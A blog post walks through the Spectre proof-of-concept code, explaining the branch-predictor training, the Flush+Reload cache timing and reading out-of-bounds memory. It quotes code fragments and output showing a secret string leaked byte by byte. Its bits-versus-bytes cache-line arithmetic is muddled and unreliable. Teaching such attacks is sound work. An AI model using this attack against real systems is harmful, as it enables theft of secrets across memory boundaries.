Into the Implementation of Spectre

In this blog post, we will get into the details of the implementation of Spectre, the exploit that targets the vulnerbilities found in CPUs built by AMD, ARM, and Intel. We assume you are familiar with the concept of the attack, and you can inspect the Proof of Concept source code provided in the Appendix of the paper linked above. You might also find it easier to read this blog post with the source code side by side.

Let’s start.

Cloud Native Now

Lines 5 and 8 include the appropriate files for rdtscp and clflush used in the Flush+Reload cache attack. Note that those instructions are not available on all processors. For instance, rdtscp (used to read the time stamp counter) is typically only available on newer CPUs. rdtsc is more common but non-serializing, meaning that the CPU may re-order it, and consequently for timing attacks it is used along with a serializing instruction such as cpuid. If neither rdtscp or rdtsc are available, there are other options (I plan to detail how to work this out on ARM in a follow-up blog post).

#ifdef _MSC_VER
#include  /* for rdtscp and clflush */
#pragma optimize("gt", on)
#include  /* for rdtscp and clflush */

At line 21, array1 represents a shared memory space between the victim and the attacker. We don’t care what’s inside this area. Its size in the code is 160 bytes, but that’s just an example: it works fine with another size 😉
The array1 is surrounded by two unused arrays: those are useful to ensure we hit different cache lines. On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.

uint8_t unused1[64];
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64];

At line 25, we have secret information. This secret is known only to the victim, and it’s what the attacker is trying to recover.
In the PoC, both victim and attacker share the same process. This is just to make the code simpler. In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function() (lines 29-35).By the way, I wondered why the secret info was The Magic Words are Squeamish Ossifrage. Such a strange sentence! In this case, Wikipedia is your friend and explains this as the solution to an RSA ciphertext challenge from 1977…

Then, at lines 27-35, we have the vulnerable victim function. My understanding of line 27 is that it is a tweak to ensure the compiler does not remove the victim_function() at compilation time. The victim_function() itself is well explained in Section 4 of the Spectre paper. With a value of x exceeding array1_size, a processor vulnerable to Spectre does the following:

  1. Reads array1_size. This results in a cache miss.

  2. While the processor is fetching array1_size – which is “long” because there is a cache miss – the branch predictor assumes the if will be true (bad guess).

  3. Speculative read of array1[x]. This is fast because it’s a cache hit.

  4. Read array2[array1[x] * 512]. This is long (cache miss).

  5. While the read at step 4 is pending, the value of step 1 arrives. The processor realizes it made a bad guess and rewinds its state.

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
void victim_function(size_t x)
    if (x < array1_size)
        temp &= array2[array1[x] * 512];

Have you noticed that the paper mentions k*256, where k is array1[x] (i.e. array1[x] * 256) while we have in the code array1[x] * 512? The multiplication factor needs to be the size of a cache line. Presumably, at the time of implementation, the authors realized that for most Intel processors this was, as we said earlier, 64 bytes per line, i.e 64*8 = 512. This value is processor dependant.

Starting at line 43 we have the readMemoryByte() function. This tries to guess the value located at a given address. For all possible byte values (there are 256) the function will test how long it takes to access that value using a Flush+Reload cache attack.
The various timings are stored in the results table and only the two best guesses are returned by the function.

Lines 52-53 merely initialize the results table. No cache attack here.

for (i = 0; i < 256; i++)
    results[i] = 0;

The cache attack is implemented between lines 54 and 89. First, to start in a clear state, we flush the entire array2 table.This table is shared with the attacker, and it needs to be able to store 256 different cache lines. Remember, a cache line size is 512 bits.

for (i = 0; i < 256; i++)
   _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

Next, the idea is to call the victim_function() several times (see lines 62-77). In sequence, it will:

First, flush the cache line


Next, to my understanding, the followinf lines are there to ensure the flush is done, and the processor does not re-order it. The comment mentions that an mfence could be issued instead, where mfence is a serializing instruction on Intel and AMD. I believe a cpuid would work as well.

for (volatile int z = 0; z < 100; z++)
} /* Delay (can also mfence) */

Third, compute x. These lines are hard to understand. I’m sure the authors could have worked out something more readable 😉 but we’ll see it is a nice tweak.

/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));

Fourth, call victim_function()

Instead of trying to understand the lines at step three, it is easier to just edit the code with a printf and watch the values as the program runs. This is what we get:

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

We quickly understand that the lines will generate five times a small x, which will lead to victim_function(x) to take the branch. Those five times are there to train the branch predictor to assume the branch will be taken… Because of the five prior trainings, a vulnerable process will speculatively execute the if branch on the sixth iteration.

After victim_function() has been called with a bad branch guess, we read how long it takes to access given byte values in the cache. That’s the core of the cache attack (lines 79-89).

/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++)
    mix_i = ((i * 167) + 13) & 255;
    addr = &array2[mix_i * 512];
    time1 = __rdtscp(&junk); /* READ TIMER */
    junk = *addr; /* MEMORY ACCESS TO TIME */
    time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
    if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */

As the comment says, we are not simply measuring time to access each byte in a sequence, but mixing them so that the processor cannot guess which byte it will access next and then optimize accesses. This is handled by line 82.

Then, at line 83, addr = &array2[mix_i * 512] computes the address of the cache line to inspect. In the next lines, 84-86, we time the access to a value in this cache line. If this goes fast, it is a cache hit. If it is slow, it is a cache miss. If we have a cache hit, it means that the cache line was recently accessed during the previous call to victim_function().Remember that the previous call to victim_function() was run with a big x meant to fool the processor. During that execution, the processor speculatively (and wrongly) accessed array1[x] where x is far bigger than the size of the array, resulting in a read in the memory far beyond. The choice of x is tuned (or guessed) to hit in the zone where the secret is written.For example, suppose the processor read the letter M of Magic in the secret. So, array1[x]='M', and consequently, at line 33, the processor accesses array2['M'*512].

As a reminder, this is line 33 in the victim_function():

temp &= array2[array1[x] * 512];

As the processor accessed array2['M'*512] it cached line number (byte)'M'. So, hopefully, if you have followed me up to now, you have understood that this reveals the value of that particular character in the secret as mix_i = array1[x] = 'M'. So, we will record that results[‘M’] is a good cache hit:

if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
    results[mix_i]++; /* cache hit - add +1 to score for this value */

The test for CACHE_HIT_THRESHOLD is pretty clear. Below that it’s a cache hit, and above it isn’t. I suspect the value for CACHE_HIT_THRESHOLD was obtained by various tests at research time.Why does it test mix_i != array1[tries % array1_size]? I am not sure about this one, but I suspect it is ruling out this index because it would typically serve more cache hits because tries is the current index value.

Good. The rest of readMemoryByte is not very interesting: it just selects the two byte values it found with the most striking cache hit.

We now jump to line 118 at the beginning of the main():

size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */

What’s happening here? In the layout of the memory of the process, we have array1, then a bunch of bytes, and then the secret.So, when we are reading array1 beyond its limits in victim_function(), if we want to read bytes inside the secret we need to jump over a given offset of bytes. To compute the offset we know that array1 + offset = secret. So, offset = secret - array1 🙂

Note that if we want to run the Spectre code to read other parts of the memory, this is absolutely possible. See lines 124-130:

if (argc == 3)
        sscanf_s(argv[1], "%p", (void * *)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer */
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %dn", (void *)malicious_x, len);

The first argument is the address to be read. The second argument is how many bytes we want to read. In the example below, we provide the address of the secret and read only 10 bytes.

$ ./spectre.out 0x400d08 10
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 10 bytes:
Reading at malicious_x = 0xffffffffffdfec68 ... Success: 0x54='T' score=2 
Reading at malicious_x = 0xffffffffffdfec69 ... Success: 0x68='h' score=2 
Reading at malicious_x = 0xffffffffffdfec6a ... Success: 0x65='e' score=2 
Reading at malicious_x = 0xffffffffffdfec6b ... Success: 0x20=' ' score=2 
Reading at malicious_x = 0xffffffffffdfec6c ... Success: 0x4D='M' score=2 
Reading at malicious_x = 0xffffffffffdfec6d ... Success: 0x61='a' score=2 
Reading at malicious_x = 0xffffffffffdfec6e ... Success: 0x67='g' score=2 
Reading at malicious_x = 0xffffffffffdfec6f ... Success: 0x69='i' score=2 
Reading at malicious_x = 0xffffffffffdfec70 ... Success: 0x63='c' score=2 
Reading at malicious_x = 0xffffffffffdfec71 ... Success: 0x20=' ' score=2

We can also try and read more than the length of the secret. For example, below we read 100 bytes and we recognize the strings Putting %s in memory, etc.

$ ./spectre.out 0x400d08 100
Reading at malicious_x = 0xffffffffffdfec8f ... Success: 0x2E='.' score=2 
Reading at malicious_x = 0xffffffffffdfec90 ... Success: 0x00='?' score=2 
Reading at malicious_x = 0xffffffffffdfec91 ... Success: 0x50='P' score=2 
Reading at malicious_x = 0xffffffffffdfec92 ... Success: 0x75='u' score=2 
Reading at malicious_x = 0xffffffffffdfec93 ... Success: 0x74='t' score=2 
Reading at malicious_x = 0xffffffffffdfec94 ... Success: 0x74='t' score=2 
Reading at malicious_x = 0xffffffffffdfec95 ... Success: 0x69='i' score=2 
Reading at malicious_x = 0xffffffffffdfec96 ... Success: 0x6E='n' score=2 
Reading at malicious_x = 0xffffffffffdfec97 ... Success: 0x67='g' score=2 
Reading at malicious_x = 0xffffffffffdfec98 ... Success: 0x20=' ' score=2 
Reading at malicious_x = 0xffffffffffdfec99 ... Success: 0x27=''' score=2 
Reading at malicious_x = 0xffffffffffdfec9a ... Success: 0x25='%' score=2 
Reading at malicious_x = 0xffffffffffdfec9b ... Success: 0x73='s' score=2 
Reading at malicious_x = 0xffffffffffdfec9c ... Success: 0x27=''' score=2 
Reading at malicious_x = 0xffffffffffdfec9d ... Success: 0x20=' ' score=2 
Reading at malicious_x = 0xffffffffffdfec9e ... Success: 0x69='i' score=2 
Reading at malicious_x = 0xffffffffffdfec9f ... Success: 0x6E='n' score=2 
Reading at malicious_x = 0xffffffffffdfeca0 ... Success: 0x20=' ' score=2 
Reading at malicious_x = 0xffffffffffdfeca1 ... Success: 0x6D='m' score=2 
Reading at malicious_x = 0xffffffffffdfeca2 ... Success: 0x65='e' score=2 
Reading at malicious_x = 0xffffffffffdfeca3 ... Success: 0x6D='m' score=2 
Reading at malicious_x = 0xffffffffffdfeca4 ... Success: 0x6F='o' score=2 
Reading at malicious_x = 0xffffffffffdfeca5 ... Success: 0x72='r' score=2 
Reading at malicious_x = 0xffffffffffdfeca6 ... Success: 0x79='y' score=2 
Reading at malicious_x = 0xffffffffffdfeca7 ... Success: 0x0A='?' score=2 
Reading at malicious_x = 0xffffffffffdfeca8 ... Success: 0x00='?' score=2 

Lines 133 to 145 attempt to read len bytes at a given offset (malicious_x) in memory, using the Spectre attack implemented in readMemoryByte().

while (--len >= 0)
        printf("Reading at malicious_x = %p... ", (void *)malicious_x);
        readMemoryByte(malicious_x++, value, score);

Recall that readMemoryByte() returns at most two values for which we recorded more than two cache hits. Personally, in all cases I tried, there was only either one value or none. If there are none, the program displays the word ‘Unclear’. If there are one or two values, it displays Success and prints the values (see lines 137-144).

Done! Hope you had fun following the code.

For this work, I wish to thank the LabSoC team of Telecom Paristech, in particular Ludovic Apvrille and Renaud Pacalet, for their helpful insights and answers to my questions. I also thank Minh Tran, David Maciejak and William McGee for their review.

— the Crypto Girl